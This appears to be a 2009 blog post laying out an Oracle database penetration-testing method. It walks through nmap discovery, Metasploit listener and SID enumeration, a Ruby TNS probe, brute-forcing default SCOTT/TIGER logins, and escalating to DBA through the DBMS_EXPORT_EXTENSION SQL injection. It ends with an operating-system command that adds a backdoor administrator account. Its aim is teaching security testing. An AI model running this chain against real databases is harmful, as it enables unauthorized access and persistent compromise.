Thursday, September 10, 2009

Oracle Security Assessment: The Open Source Approach

Over the past couple of years a number of Oracle vulnerabilities and exploits have been discovered, but without any standard methodology or guidelines for testing for them. Moreover, there is no publicly available pentesting framework dedicated to checking the built-in packages for input validation attacks that lead to privilege escalation and data extraction. In this article, I will present an Oracle pentesting methodology as a series of distinct steps.

1. Discovery
Port scanning for Oracle services can be done with Nmap. Oracle products use different default ports, but the main "Oracle TNS Listener" normally lives in the range 1521-1540 (1521 by default) unless it has been moved, so scan the whole range rather than just 1521 if nothing shows up on the default port. Nmap's -sV service detection recognises the listener banner.
For more information on ports used by Oracle, please visit:
http://www.red-database-security.com/whitepaper/oracle_default_ports.html

bt#: nmap -sV 192.168.0.100-105 -p 1521
Starting Nmap 4.85BETA8 ( http://nmap.org ) at 2009-06-18 15:25 EDT
Interesting ports on 192.168.0.100:
PORT STATE SERVICE VERSION
1521/tcp open oracle-tns Oracle TNS Listener
Interesting ports on 192.168.0.101:
PORT STATE SERVICE VERSION
1521/tcp open oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)

2. Version Enumeration/Fingerprinting
To learn the exact version of the TNS Listener, use the Metasploit auxiliary module tnslsnr_version:
msf auxiliary(tnslsnr_version) > info
Name: Oracle tnslsnr Service Version Query.
Version: 6479
License: Metasploit Framework License (BSD)
Provided by: CG
Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS                    yes       The target address range or CIDR identifier
RPORT    1521             yes       The target port
THREADS  1                yes       The number of concurrent threads

Description:
This module simply queries the tnslsnr service for the Oracle build.

msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.100
RHOSTS => 192.168.0.100
msf auxiliary(tnslsnr_version) > run
[*] Host 192.168.0.100 is running: 32-bit Windows: Version 10.2.0.1.0 - Production

msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.102
RHOSTS => 192.168.0.102
msf auxiliary(tnslsnr_version) > run
[*] Host 192.168.0.102 is running: Solaris: Version 10.2.0.1.0 - Production

msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.103
RHOSTS => 192.168.0.103
msf auxiliary(tnslsnr_version) > run
[*] Host 192.168.0.103 is running: Linux: Version 11.1.0.6.0 - Production
[*] Auxiliary module execution completed

On older listeners such as the 9.2.0.1.0 host below, the "Oracle SID" can be read straight from the listener, which is what the sid_enum module does. For newer versions after 9.2.0.8 the listener no longer hands out this information to remote clients, so the SID has to be guessed or brute-forced.

[*] Host 192.168.0.105 is running: 32-bit Windows: Version 9.2.0.1.0 - Production
msf > use auxiliary/scanner/oracle/sid_enum
msf auxiliary(sid_enum) > set RHOSTS 192.168.0.105
RHOSTS => 192.168.0.105
msf auxiliary(sid_enum) > run
[*] Identified SID for 192.168.0.105: PLSExtProc
[*] Identified SID for 192.168.0.105: cyxt
[*] Identified SERVICE_NAME for 192.168.0.105: PLSExtProc
[*] Identified SERVICE_NAME for 192.168.0.105: cyxt
[*] Identified SERVICE_NAME for 192.168.0.105: cyxtXDB
[*] Auxiliary module execution completed

Note that PLSExtProc is the external procedure (extproc) service, not a database instance; the instance to connect to is cyxt, and cyxtXDB is its XML DB service name.

Bruteforce Method

msf auxiliary(sid_brute) > run
[*] Starting brute force on 192.168.0.103, using sids from /home/bt/msf3/dev/data/exploits/sid.txt...
[*] Found SID 'ORCL' for host 192.168.0.103
[*] Auxiliary module execution completed

Apart from guessing and brute-forcing, other Oracle components, such as Oracle servlets and web applications, often disclose the SID and can be used to determine it.
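To show what the two modules above actually send and receive, here is an added example in plain Ruby (Metasploit's own language); it was written for this article and is not code from the post or from Metasploit. It builds the TNS connect packet that carries a listener command (VERSION or STATUS), decodes the VSNNUM field of the reply into the familiar dotted version, and extracts SIDs and service names from a STATUS reply. The field layout follows the standard TNS connect packet; the sample replies at the bottom are constructed to match the lab output above, not captured from a real listener, and the target address in the usage block is an assumption.

```ruby
# Added example (not from the original post or Metasploit): a bare TNS
# listener probe showing what tnslsnr_version and sid_enum do under the hood.
# The sample replies at the bottom are constructed, not real captures.
require 'socket'
require 'timeout'

module TnsProbe
  TNS_CONNECT = 1           # TNS packet type: connect
  TNS_DATA    = 6           # TNS packet type: data
  CONNECT_DATA_OFFSET = 58  # 8-byte TNS header + 50-byte connect section

  # Connect packet whose connect string carries a listener command instead of
  # a SERVICE_NAME/SID, so the listener answers without opening a DB session.
  def self.build_command_packet(command)
    cd  = "(CONNECT_DATA=(COMMAND=#{command}))"
    len = CONNECT_DATA_OFFSET + cd.bytesize
    # packet length, packet checksum, type, reserved, header checksum
    header  = [len, 0, TNS_CONNECT, 0, 0].pack('nnCCn')
    connect = [
      310, 300,                      # TNS version, lowest compatible version
      0, 2048, 32_767,               # service options, SDU, TDU
      0x4f98, 0, 1,                  # NT protocol chars, line turnaround, "one"
      cd.bytesize, CONNECT_DATA_OFFSET,
      0, 0, 0                        # max receivable data, connect flags 0/1
    ].pack('n10NCC') + ("\x00" * 24) # trace facility ids, connection id, padding
    header + connect + cd
  end

  # Wrap text in a TNS data packet (used here to construct sample replies).
  def self.data_packet(text)
    [10 + text.bytesize, 0, TNS_DATA, 0, 0, 0].pack('nnCCnn') + text
  end

  # Concatenate the payloads of every TNS packet in a reply; data packets
  # carry a 2-byte flag word after the 8-byte header.
  def self.payload(raw)
    out = String.new
    pos = 0
    while pos + 8 <= raw.bytesize
      len = raw.byteslice(pos, 2).unpack('n').first
      break if len < 8 || pos + len > raw.bytesize
      skip = raw.getbyte(pos + 4) == TNS_DATA ? 10 : 8
      out << raw.byteslice(pos + skip, len - skip)
      pos += len
    end
    out
  end

  # VSNNUM is the version packed in hex: 0x09200100 = 9.2.0.1.0,
  # 0x0A200100 = 10.2.0.1.0, 0x0B100600 = 11.1.0.6.0.
  def self.decode_vsnnum(vsnnum)
    h = format('%08x', vsnnum)
    [h[0, 2], h[2, 1], h[3, 1], h[4, 2], h[6, 2]].map { |x| x.to_i(16) }.join('.')
  end

  def self.parse_version(raw)
    text = payload(raw)
    vsn  = text[/VSNNUM=(\d+)/, 1]
    { vsnnum:  vsn && vsn.to_i,
      version: vsn && decode_vsnnum(vsn.to_i),
      banner:  text[/TNSLSNR for [^\x00\n]*?Version [\d.]+[^\x00\n]*/] }
  end

  # Listeners up to 9.2 answer STATUS with every registered service; 10g and
  # later refuse remote callers, which is why the SID then has to be brute-forced.
  def self.parse_status(raw)
    text = payload(raw)
    { sids:          text.scan(/\(INSTANCE_NAME=([^)]+)\)/).flatten.uniq,
      service_names: text.scan(/\(SERVICE_NAME=([^)]+)\)/).flatten.uniq }
  end

  # Send one listener command to a live host and return the raw reply bytes.
  def self.query(host, command, port: 1521, timeout: 5)
    raw = String.new
    begin
      Timeout.timeout(timeout) do
        TCPSocket.open(host, port) do |s|
          s.write(build_command_packet(command))
          loop { raw << s.readpartial(65_535) }
        end
      end
    rescue EOFError, Timeout::Error
      # listener closed the connection or went quiet: parse what we have
    end
    raw
  end
end

# Constructed sample replies modelled on the lab output above (not real captures).
SAMPLE_VERSION_REPLY =
  TnsProbe.data_packet('(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0))') +
  TnsProbe.data_packet("TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production\n")
SAMPLE_STATUS_REPLY = TnsProbe.data_packet(
  '(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0))' \
  '(SERVICE=(SERVICE_NAME=PLSExtProc)(INSTANCE=(INSTANCE_NAME=PLSExtProc)(NUM=1)))' \
  '(SERVICE=(SERVICE_NAME=cyxt)(INSTANCE=(INSTANCE_NAME=cyxt)(NUM=1)))' \
  '(SERVICE=(SERVICE_NAME=cyxtXDB)(INSTANCE=(INSTANCE_NAME=cyxt)(NUM=1)))'
)

if $PROGRAM_NAME == __FILE__
  p TnsProbe.parse_version(SAMPLE_VERSION_REPLY)
  p TnsProbe.parse_status(SAMPLE_STATUS_REPLY)
  if (host = ARGV[0]) # e.g. ruby tns_probe.rb 192.168.0.105 (assumed lab address)
    p TnsProbe.parse_version(TnsProbe.query(host, 'VERSION'))
    p TnsProbe.parse_status(TnsProbe.query(host, 'STATUS'))
  end
end
```

Run it against a listener with `ruby tns_probe.rb 192.168.0.105` (assumed address). Against a 10g or 11g listener the STATUS reply carries an error instead of the service list, because the listener refuses to authenticate a remote client; that is exactly the case the brute-force method below is for.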


3. Bruteforce Attack
Using a standard or extended password list, one can brute-force combinations of usernames and passwords against the SID found above; Metasploit's brute_login module tries the well-known default accounts such as SCOTT/TIGER. Be aware that the DEFAULT profile in 10gR2 and later sets FAILED_LOGIN_ATTEMPTS to 10, so an unthrottled run can lock out the very accounts you are testing.
msf auxiliary(brute_login) > run

[-] ORA-01017: invalid username/password; logon denied
[-] ORA-01017: invalid username/password; logon denied
[*] Auxiliary module execution completed
msf auxiliary(brute_login) > db_notes
[*] Time: Sat May 30 08:44:09 -0500 2009 Note: host=172.10.1.109 type=BRUTEFORCED_ACCOUNT data=SCOTT/TIGER


4. Injection Attack & Privilege Exploitation
With a valid low-privileged login (SCOTT/TIGER from the previous step), a SQL injection flaw in a built-in package that runs with its definer's (SYS) rights can be used to grant DBA to our user. Metasploit's dbms_export_extension module does this for the DBMS_EXPORT_EXTENSION package; it only works if the target has not applied the Critical Patch Update that fixed the flaw and the user can execute the package, which is granted to PUBLIC on affected versions.

msf > use auxiliary/sqli/oracle/dbms_export_extension
msf auxiliary(dbms_export_extension) > info
Name: SQL Injection via DBMS_EXPORT_EXTENSION.
Version: $Revision:$
Provided by: MC
Basic options:
Name    Current Setting     Required  Description
----    ---------------     --------  -----------
SQL     GRANT DBA TO SCOTT  no        SQL to run.
DBPASS  TIGER               yes       The password to authenticate as.
DBUSER  SCOTT               yes       The username to authenticate as.
RHOST   127.0.0.1           yes       The Oracle host.
RPORT   1521                yes       The TNS port.
SID     DEMO                yes       The SID to authenticate with.

Description:
This module will escalate an Oracle DB user to DBA by exploiting an
SQL injection bug in the DBMS_EXPORT_EXTENSION package.

msf auxiliary(dbms_export_extension) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(dbms_export_extension) > set SID UNLUCKY
SID => UNLUCKY
msf auxiliary(dbms_export_extension) > run

[*] Sending package...
[*] Done...
[*] Sending body...
[*] Done...
[*] Sending declare...
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(dbms_export_extension) >

To verify the escalation, query the role assignments with the oracle_sql module (same RHOST, SID and SCOTT/TIGER credentials as above):

msf auxiliary(oracle_sql) > set SQL select * from user_role_privs
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run
[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,DBA,NO,YES,NO   <-- new privilege :-)
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >


5. Post Exploitation

With DBA rights, the win32exec module loads a Java class and a PL/SQL wrapper procedure into the database and uses them to run an operating system command on the database server, with the privileges of the account the Oracle service runs as:

msf auxiliary(win32exec) > set CMD "net user dba P@ssW0rd /add"
CMD => net user dba P@ssW0rd /add
msf auxiliary(win32exec) > run
[*] Creating MSF JAVA class...
[*] Done...
[*] Creating MSF procedure...
[*] Done...
[*] Sending command: 'net user dba P@ssW0rd /add'
[*] Done...
[*] Auxiliary module execution completed

This set of steps gives a clear view of how Oracle infrastructure can be exploited by following this or a similarly adapted penetration testing methodology. It is therefore important for security professionals to understand and correlate these testing methods in order to derive the requirements for Oracle platform security.